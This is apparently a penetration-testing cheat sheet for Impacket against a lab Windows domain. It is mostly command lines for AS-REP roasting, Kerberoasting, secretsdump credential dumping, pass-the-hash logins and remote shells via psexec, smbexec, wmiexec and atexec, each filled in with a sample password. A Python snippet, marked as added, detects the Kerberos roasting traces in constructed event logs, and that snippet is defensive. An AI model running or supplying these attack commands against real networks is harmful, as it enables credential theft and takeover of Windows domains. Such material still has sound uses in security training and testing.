Impacket
Impacket is a collection of Python libraries and tools designed for working with network protocols, commonly used in penetration testing, red teaming, and post-exploitation. It supports a wide range of protocols such as SMB, TCP, UDP, HTTP, LDAP, and more, allowing users to craft, manipulate, and interact with network packets. Impacket includes tools for tasks like remote command execution, credential dumping, and SMB/NTLM operations, making it particularly useful for interacting with Windows networks. Its scriptable and extensible nature, along with its support for low-level protocol manipulation, makes Impacket a powerful tool for security professionals.
AS-REP Roasting: unprivileged accounts on the Windows domain
impacket-GetNPUsers GHOUL.com/ -dc-ip 192.168.0.10 -no-pass -usersfile /users.txt
Getting user account hashes with a compromised SPN user on the AD
impacket-GetUserSPNs GHOUL.com/ghoul:"Hang@123" -dc-ip 192.168.0.10
This will list the other SPN users in the Windows AD; to get their hashes, we dump them with the following command:
impacket-GetUserSPNs GHOUL.com/ghoul:"Hang@123" -dc-ip 192.168.0.10 -request
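An added detection example, not part of the original page or of Impacket: it flags the Domain Controller Security log traces of the two requests above, a successful event 4768 with pre-authentication type 0 (AS-REP roasting) and several event 4769 requests for RC4 (0x17) tickets to user-account services from one requester. The sample records, the account names other than ghoul, the source addresses and the threshold of 3 are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample records (not real logs), shaped like the EventData fields of
# Windows Security events 4768 (TGT request) and 4769 (service ticket request).
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc_backup", "PreAuthType": "0",
     "Status": "0x0", "IpAddress": "::ffff:192.168.0.50"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "Status": "0x0", "IpAddress": "::ffff:192.168.0.21"},
    {"EventID": 4769, "TargetUserName": "ghoul@GHOUL.COM", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.0.50"},
    {"EventID": 4769, "TargetUserName": "ghoul@GHOUL.COM", "ServiceName": "websvc",
     "TicketEncryptionType": "0x00000017", "IpAddress": "::ffff:192.168.0.50"},
    {"EventID": 4769, "TargetUserName": "ghoul@GHOUL.COM", "ServiceName": "iissvc",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.0.50"},
    {"EventID": 4769, "TargetUserName": "alice@GHOUL.COM", "ServiceName": "FILESRV01$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.0.21"},
]

def source_ip(event):
    """Strip the IPv4-mapped IPv6 prefix (::ffff:a.b.c.d) from the logged address."""
    return event.get("IpAddress", "").replace("::ffff:", "")

def detect(events, spn_threshold=3):
    """Return sorted (kind, source_ip, requester, targets) findings."""
    asrep = defaultdict(set)    # source ip -> accounts issued a TGT without pre-auth
    rc4_tgs = defaultdict(set)  # (source ip, requester) -> user-account services
    for ev in events:
        if ev["EventID"] == 4768:
            user = ev.get("TargetUserName", "")
            # Successful request with PreAuthType 0: the KDC skipped pre-authentication.
            if (ev.get("PreAuthType") == "0" and not user.endswith("$")
                    and int(ev.get("Status", "0x0"), 16) == 0):
                asrep[source_ip(ev)].add(user)
        elif ev["EventID"] == 4769:
            svc = ev.get("ServiceName", "")
            # 0x17 = RC4-HMAC; hex is parsed so padded and short forms both match.
            if (int(ev.get("TicketEncryptionType", "0x0"), 16) == 0x17
                    and not svc.endswith("$") and svc.lower() != "krbtgt"):
                rc4_tgs[(source_ip(ev), ev.get("TargetUserName", ""))].add(svc)
    findings = [("asrep-no-preauth", ip, "", sorted(u)) for ip, u in asrep.items()]
    findings += [("rc4-service-tickets", ip, who, sorted(s))
                 for (ip, who), s in rc4_tgs.items() if len(s) >= spn_threshold]
    return sorted(findings)

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Both events are only written when Kerberos authentication service and service ticket auditing are enabled on the Domain Controllers.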
Impacket psexec
Once we crack the hashes of the privileged accounts on the AD, we try to get a shell on the target machine using:
impacket-psexec GHOUL.com/ghoul:"Hang@123"@192.168.0.10
To dump the secrets of other users:
impacket-secretsdump GHOUL.com/ghoul:"Hang@123"@192.168.0.10
After getting the full hashes of the active accounts on the AD, we can log in to any user account by providing the hash directly:
impacket-psexec GHOUL.com/ghoul@192.168.0.10 -hashes <hash:hash>
It is very important to check whether the same account also exists in the local workgroup, which can be checked with:
impacket-psexec ghoul:"Hang@123"@192.168.0.10
Impacket-smbexec & Impacket-wmiexec
impacket-smbexec GHOUL.com/ghoul:"Hang@123"@192.168.0.10
impacket-wmiexec GHOUL.com/ghoul:"Hang@123"@192.168.0.10
Impacket-atexec: directly pass commands on the targeted server
impacket-atexec GHOUL.com/ghoul:"Hang@123"@192.168.0.10 whoami
Lookup SID to list potential users on the targeted domain
impacket-lookupsid GHOUL.com/ghoul:"Hang@123"@192.168.0.10
Services execution on the targeted domain
impacket-services GHOUL.com/ghoul:"Hang@123"@192.168.0.10 --help
impacket-services GHOUL.com/ghoul:"Hang@123"@192.168.0.10 list
impacket-services GHOUL.com/ghoul:"Hang@123"@192.168.0.10 start <service name>

SMBclient over Impacket
impacket-smbclient GHOUL.com/ghoul:"Hang@123"@192.168.0.10
To crack the hashes we can use hashcat. A detailed overview of hashcat is given below:
Hashcat